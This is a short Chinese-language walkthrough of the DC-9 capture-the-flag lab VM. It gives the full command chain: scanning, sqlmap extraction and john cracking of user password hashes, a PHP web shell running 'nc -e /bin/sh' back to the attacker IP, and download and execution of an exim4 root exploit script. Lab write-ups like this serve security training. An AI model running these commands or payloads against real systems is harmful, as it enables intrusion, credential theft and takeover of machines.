环境准备
DC-9靶机链接:百度网盘 请输入提取码
提取码:arn4
虚拟机网络链接模式:桥接模式
攻击机系统:kali linux 2021.1
信息搜集
1.探测目标靶机ip arp-scan -l
用nmap探测靶机开放端口和对应服务情况 nmap -p- -A -T4 192.168.166.136
漏洞利用
1.找到SQL注入漏洞
2.sqlmap -u http://192.168.166.136/?nid=1 --dbs
3.sqlmap -u http://192.168.166.136/?nid=1 -D d7db --tables
4.sqlmap -u http://192.168.166.136/?nid=1 -D d7db -T users --columns
5.sqlmap -u http://192.168.166.136/?nid=1 -D d7db -T users -C uid,name,pass --dump
6.把密码写进hash.txt里用john工具破解出一个密码
john hash.txt
7.登录成功
8.写入php代码,反弹shell.
<p>demon</p>
<?php
system("nc -e /bin/sh 192.168.166.131 4444");
?>
9反弹成功!
python -c 'import pty;pty.spawn("/bin/bash")'
权限提升
1.用find命令查询以suid权限执行的文件
find / -perm -u=s -type f 2>/dev/null
2.发现一个exim4可利用
exim4 --version
3.查询相关利用脚本
4.下载到当前目录下并查看
set ff=unix
5.开启http服务,将脚本下载到靶机
wget http://192.168.166.131:8000/46996.sh
6.给执行权限,执行没成功
7.添加参数提权成功
./46996.sh -m netcat